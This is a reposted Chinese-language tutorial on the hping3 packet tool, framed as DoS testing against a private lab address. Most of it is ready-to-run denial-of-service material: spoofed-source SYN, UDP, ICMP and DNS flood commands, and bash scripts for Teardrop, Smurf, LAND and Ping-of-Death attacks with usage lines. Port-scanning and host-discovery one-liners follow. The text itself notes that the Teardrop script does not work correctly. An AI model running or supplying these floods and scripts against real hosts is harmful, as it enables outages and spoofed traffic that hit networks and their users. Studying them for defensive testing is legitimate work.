hping3使用介紹及DoS測試


hping3使用介紹

端口掃描
sudo hping3 -I eth1 -S 192.168.180.133 -p 80

SYN Flood
默認協議:tcp
默認端口:隨機
默認源地址:攻擊者本機IP地址

# 通過eth1,發送SYN報文到 192.168.180.133:80。偽造源地址為192.168.180.131,時間間隔1000us。
sudo hping3 -I eth1 -S 192.168.180.133 -p 80 -a 192.168.180.131 -i u1000

# 通過eth1,發送SYN報文到192.168.180.133:80,偽造隨機源地址,時間間隔1000us。
sudo hping3 -I eth1 -S 192.168.180.133 -p 80 --rand-source -i u1000

# 通過 eth1,發送SYN報文到192.168.180.133:80,偽造隨機源地址,洪水攻擊。
# 洪水攻擊,速率最快的攻擊,不會顯示數據和丟包的統計。
sudo hping3 -I eth1 -S 192.168.180.133 -p 80 --rand-source --flood

sudo hping3 -c 1000 -d 120 -S -p 80 --flood --rand-source 192.168.180.133
sudo hping3 -S -P -U -p 80 --flood --rand-source 192.168.180.133

TCP Flood

sudo hping3 -SARUPF -p 80 --flood --rand-source 192.168.180.133


UDP Flood
# 發送udp報文到192.168.180.133:80
sudo hping3 --udp 192.168.180.133 -p 80

# 發送 udp 報文 到 192.168.1.1:80。偽造隨機源地址,洪水攻擊。
sudo hping3 --udp 192.168.180.133 -p 80 --rand-source --flood

sudo hping3 --udp -s 6666 -p 53 -a 29.29.29.29 --flood 192.168.180.133


ICMP Flood
# 發送icmp報文到192.168.180.133
sudo hping3 --icmp 192.168.180.133

# 發送icmp報文到192.168.180.133,偽造隨機源IP地址,供水攻擊
sudo hping3 --icmp 192.168.180.133 --rand-source --flood

sudo hping3 -q -n -d 200 --icmp --flood -a 28.28.28.28 192.168.180.133


DNS Flood
# 發送udp報文到192.168.180.133:53 偽造隨機源IP地址,洪水攻擊
sudo hping3 --udp 192.168.180.133 -p 53 --rand-source --flood

Teardrop攻擊

基於hping3的測試腳本

#!/bin/bash

function teardrop()
{
    local victim_ip=$1
    local id_begin=$2
    local id_end=$3

    for(( id=${id_begin}; id<${id_end}; id++))
    do
        hping3 --icmp ${victim_ip} --data 1000 --id ${id} --count 1 --morefrag
        hping3 --icmp ${victim_ip} --data 200 --id ${id} --count 1 --fragoff 400
    done
}

teardrop $*

上述腳本測試有問題

Smurf攻擊

保存成shell腳本執行格式如下:
sudo ./smurf.sh 192.168.180.133 192.168.180.2

#!/bin/bash

function smurf ( )
{
    local victim_ip=$1
    local broadcast_ip=$2
    hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood
}

smurf $*

手動測試
sudo hping3 -1 -a 192.168.180.133 192.168.180.255


XMAS TREE攻擊

sudo hping3 -SFRP 192.168.180.133

LAND攻擊

LAND攻擊方式采用了特別構造的TCP SYN數據包(通常用於開啟一個新的連接),使目標機器開啟一個源地址與目標地址均為自身IP地址的空連接,持續地自我應答,消耗系統資源直至崩潰,這種攻擊方法與SYN洪泛攻擊並不相同

將下面代碼保存為land.sh

#!/bin/bash

function land()
{
    local victim_ip=$1
    local victim_port=$2
    hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood
}

land $*

執行:sudo ./landhping3.sh 192.168.180.133 80
手動執行:sudo hping3 -n -S -p 80 -a 192.168.180.133 --flood 192.168.180.133


Ping of Death俗稱"死ping"
其攻擊原理是攻擊者A向受害者B發送一些尺寸超大的ICMP(Ping命令使用的是ICMP報文)報文對其進行攻擊(對於有些路由器或系統,在接收到一個這樣的報文后,由於處理不當,會造成系統崩潰、死機或重啟)

將下面代碼保存為pingofdeath.sh

#!/bin/bash

function ping_of_death()
{
    local victim_ip=$1
    local id=186
    local data_size=1450
    let icmp_size=${data_size}+8
    hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag 

    for i in $(seq 50)
    do
        let offset=${i}*${icmp_size}
        hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
    done
}

ping_of_death $*


執行:sudo ./pingofdeath.sh 192.168.180.133

ICMP測試

sudo hping3 -1 192.168.180.133

數據包跟蹤

sudo hping3 --traceroute -V -1 www.qq.com

端口掃描

單端口掃描
sudo hping3 -I eth1 -p 22 -c 1 -S 192.168.180.133
返回的信息中含有flags=SA 表示端口是通的 SYN+ACK  ,如果返回flags=RA 則表示端口不通

多端口掃描
sudo hping3 -I eth1 -8 1-1024 192.168.180.133

返回結果如下:
kali@kali:~/Downloads/ddos/hping3test$ sudo hping3 -I eth1 -8 1-1024 192.168.180.133
Scanning 192.168.180.133 (192.168.180.133), port 1-1024
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports: (21 ftp) (22 ssh) (23 telnet) (25 smtp) (53 domain) (80 http) (111 sunrpc) (139 netbios-ssn) (445 microsoft-d) (512 exec) (513 login) (514 shell)


主機發現

for addr in $(seq 1 254);do hping3 192.168.180.$addr -c 1 --icmp >> result.txt & done


參考:
https://wp.baijinming.com/00/id=2576.html
https://man.linuxde.net/hping3
https://www.cnblogs.com/liuxinyustu/articles/12808972.html
https://mochazz.github.io/2017/07/23/hping3/
http://www.legendwolf.com/?id=57

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM